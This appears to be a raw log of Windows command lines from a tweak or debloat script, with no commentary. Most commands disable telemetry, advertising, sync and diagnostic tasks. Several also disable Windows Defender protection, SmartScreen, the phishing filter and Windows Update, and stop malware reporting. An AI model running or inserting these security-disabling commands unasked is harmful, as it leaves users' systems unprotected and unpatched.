Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f

C:\Windows\system32\sc.exe

sc stop dmwappushservice

C:\Windows\system32\net.exe

net stop dmwappushservice

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop dmwappushservice

C:\Windows\system32\sc.exe

sc config dmwappushservice start= disabled

C:\Windows\system32\net.exe

net stop diagnosticshub.standardcollector.service

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop diagnosticshub.standardcollector.service

C:\Windows\system32\sc.exe

sc config diagnosticshub.standardcollector.service start= disabled

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync" /v "SyncPolicy" /t REG_DWORD /d "5" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Personalization" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\BrowserSettings" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Credentials" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Language" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Accessibility" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\SettingSync\Groups\Windows" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableWindowsLocationProvider" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensors" /v "DisableLocationScripting" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Sensor\Permissions\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeliveryOptimization" /v "DODownloadMode" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization" /v "SystemSettingsDownloadMode" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Speech" /v "AllowSpeechModelUpdate" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgrade" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpgradePeriod" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferUpdatePeriod" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsStore\WindowsUpdate" /v "AutoDownload" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wuauserv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\7971f918-a847-4430-9279-4a52d1efe18d" /v "RegisteredWithAU" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\OneDrive" /v "PreventNetworkTrafficPreUserSignIn" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Siuf\Rules" /v "PeriodInNanoSeconds" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BingSearchEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SoftLandingEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Customer Experience Improvement Program\Uploader" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\StartupAppTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\StartupAppTask" /disable"

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyMonitor" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyRefresh" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Shell\FamilySafetyUpload"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Shell\FamilySafetyUpload" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Autochk\Proxy"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Autochk\Proxy" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Maintenance\WinSAT"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Maintenance\WinSAT" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Application Experience\AitAgent"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Application Experience\AitAgent" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\Windows Error Reporting\QueueReporting" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\DiskFootprint\Diagnostics"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\DiskFootprint\Diagnostics" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\FileHistory\File History (maintenance mode)" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\PI\Sqm-Tasks"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\PI\Sqm-Tasks" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\NetTrace\GatherNetworkInfo" /disable

C:\Windows\system32\schtasks.exe

schtasks /end /tn "\Microsoft\Windows\AppID\SmartScreenSpecific"

C:\Windows\system32\schtasks.exe

schtasks /change /tn "\Microsoft\Windows\AppID\SmartScreenSpecific" /disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\SettingSync\BackgroundUploadTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319" /Disable schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ApplicationData\CleanupTemporaryState" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ApplicationData\DsSvcCleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\AitAgent" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\BthSQM" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\HypervisorFlightingTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Diagnosis\Scheduled" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskFootprint\Diagnostics" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\DiskFootprint\StorageSense" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\File Classification Infrastructure\Property Definition Sync" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Management\Provisioning\Logon" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maintenance\WinSAT" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maps\MapsToastTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Maps\MapsUpdateTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Multimedia\SystemSoundsService" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NlaSvc\WiFiTask" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NetCfg\BindingWorkItemQueueHandler" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\NetTrace\GatherNetworkInfo" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Offline Files\Background Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Offline Files\Logon Synchronization" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\PI\Sqm-Tasks" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Ras\MobilityManager" /Disable

C:\Windows\system32\schtasks.exe

